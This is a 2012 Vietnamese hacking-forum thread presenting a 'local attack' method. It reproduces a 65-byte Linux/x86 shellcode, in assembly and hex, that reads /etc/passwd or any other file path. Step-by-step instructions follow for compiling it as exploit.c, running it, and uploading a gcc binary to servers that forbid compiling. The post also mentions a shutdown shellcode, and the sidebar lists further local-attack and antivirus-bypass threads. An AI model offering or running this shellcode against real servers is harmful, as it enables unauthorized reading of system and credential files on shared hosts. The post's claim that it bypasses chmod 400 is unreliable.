[New method] Local (it can bypass chmod 400)

Admin · Jul 2, 2012

Ta dùng em này nhé Linux/x86 - File Reader /etc/passwd - 65 bytes

PHP:

/*
Linux/x86 file reader.
65 bytes   pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd

Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh
gcc -o exploit exploit.c Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh

PHP:

Chmod  x exploit

Và cuối cùng là
./exploit Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko
Cách thực hiện rất dễ.
Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....
Download gcc gcc.zip
Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.
Linux/x86 - Shutdown computer - 51 bytes
done.

Nghiapro · Jul 2, 2012

admin em khong PM duoc

Thread starter	Title	Forum	Replies	Date
	Hướng dẫn kiếm 100$ mỗi ngày - Method earn $100 dollar per day	Tut, tool, mmo	4	Oct 23, 2020
	Hướng dẫn fix lỗi please enter a valid callback method cho xenforo	Xenforo	0	Jan 4, 2013
T	Hướng dẫn làm việc local repo và remote repo trong Git	Tin tức CNTT	0	Nov 8, 2019
G	Help ai chỉ em cách local attack vs	Local attack	0	Jul 30, 2014
C	Phương pháp chống local attack !	Chống local, attack, symlink, ddos	0	Mar 16, 2014
C	Mẹo Chống Ddos, Local Attack	Chống local, attack, symlink, ddos	0	Mar 16, 2014
	10 thủ thuật local seo	Thảo luận SEO	0	Jun 20, 2013
	Share TUT Local Full 2012	Tut, tool, mmo	6	Jun 14, 2013
V	Share Tư duy local cơ bản	Hacking	0	Jan 12, 2013
V	Tư duy Local Nâng Cao (Hạ Safemode)	Hacking	0	Jan 12, 2013
T	Hướng dẫn chmod chống local	Johncms	2	Dec 24, 2012
X	Hướng dẫn Cài local host với XAMPP	Hosting / Domain	0	Dec 19, 2012
	Tìm user của victim khi local	Local attack	0	Dec 11, 2012
H	Blog - Vũ khí bí mật cho Local SEO Xem thêm: Blog - Vũ khí bí mật cho Local SEO Cộng đồng Diễn Đàn	Thảo luận SEO	0	Nov 30, 2012
	Hướng dẫn Chmod Chống Local Attack	Bảo mật	0	Nov 21, 2012
	Local apache cho newbie	Local attack	1	Nov 14, 2012
	Tut local căn bản cho newbie	Local attack	2	Oct 18, 2012
	[Tool] Local Attack Server Linux	Tut, tool, mmo	0	Aug 25, 2012
K	KShell 1.2 công cụ không thể thiếu khi local server window	Local attack	0	Jul 28, 2012
K	Kỹ thuật sử dụng shell/remote local Lan	Local attack	0	Jul 28, 2012
	Các câu lệnh sử dụng Shell và cách khắc phục sự cố không local được	Local attack	0	Jun 20, 2012
	Bảo mật chống local attack server linux	Bảo mật	3	Jun 16, 2012
V	Shell local nè a.e	Security - Local - Hacking	22	Jun 6, 2012
	Full hạn chế local, attack	Chống local, attack, symlink, ddos	0	May 31, 2012
	Hạn chế local attack cho vbb	Chống local, attack, symlink, ddos	0	May 26, 2012
	Thông báo Forum đang chạy trên server mới, chống 100% local và ddos, tốc độ load nhanh	Thông báo mới	32	May 8, 2012
	[Tut] bảo mật website chống local, att tốt cơ bản và nâng cao	Chống local, attack, symlink, ddos	98	May 1, 2012
	[Local attack] làm gì khi safe_mode: ON	Local attack	0	May 1, 2012
	Hướng dẫn local attack, symlink từ a đến z	Local attack	5	Apr 30, 2012
	[SHARE] Code Reverse IP - Lợi Cho Local Attack	Security - Local - Hacking	0	Mar 18, 2012
	Hạn chế local attach	Vbulletin	0	Feb 16, 2012
	Hướng dẫn chi tiết cách bảo mật tối đa cho website/forum tránh 99% nguy cơ bị Local	Vbulletin	2	Feb 16, 2012
	1 vai video local	Thảo luận wap việt	0	Jan 28, 2012
	Tut SQL + up shell +local (tổng hợp)	Thảo luận wap việt	3	Jan 28, 2012
	403 forbidden and cant read /etc/named.conf error bypass	Tut, tool, mmo	2	Dec 9, 2012
	[Tut] sql bypass 406 cực cơ bản cho newbie	Tut, tool, mmo	0	Nov 11, 2012
	[Tut] bypass admin cpanel	Tut, tool, mmo	0	Nov 10, 2012
	Tool bypass antivirus cho keylog, trojan	Sử dụng, chia sẻ, hỏi đáp	2	Sep 2, 2012
S	Bypass là gì?	Security - Local - Hacking	5	May 29, 2012
	Tut bypass access denied	Security - Local - Hacking	1	Apr 29, 2012

[New method] Local (it can bypass chmod 400)

Admin

Well-Known Member

Nghiapro

New Member

Facebook Comments

Similar threads

New posts New threads New resources

New posts

New threads

new_resources